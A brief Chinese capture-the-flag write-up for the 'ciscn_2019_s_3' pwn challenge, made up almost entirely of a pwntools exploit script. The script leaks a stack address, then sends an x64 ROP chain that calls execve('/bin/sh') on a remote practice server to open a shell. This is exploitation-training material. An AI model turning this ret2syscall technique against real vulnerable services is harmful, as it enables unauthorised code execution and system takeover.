pwn | ciscn_2019_s_3

x64 ret2syscall
主要参考：https://blog.csdn.net/github_36788573/article/details/103541178

感觉ret2syscall比较灵活，哎。

from pwn import *

context.log_level = 'debug'


# p = process('./ciscn_s_3')
p = remote('node4.buuoj.cn',25448)

main=0x0004004ED
execv=0x04004E2
pop_rdi=0x4005a3
pop_rbx_rbp_r12_r13_r14_r15=0x40059A
mov_rdxr13_call=0x0400580
sys=0x00400517

pl1=b'/bin/sh\x00'*2+p64(main)
p.send(pl1)
p.recv(0x20)
sh=u64(p.recv(8))-280
print(hex(sh))

pl2=b'/bin/sh\x00'*2+p64(pop_rbx_rbp_r12_r13_r14_r15)+p64(0)*2+p64(sh+0x50)+p64(0)*3
pl2+=p64(mov_rdxr13_call)+p64(execv)
pl2+=p64(pop_rdi)+p64(sh)+p64(sys)
p.send(pl2)

p.interactive()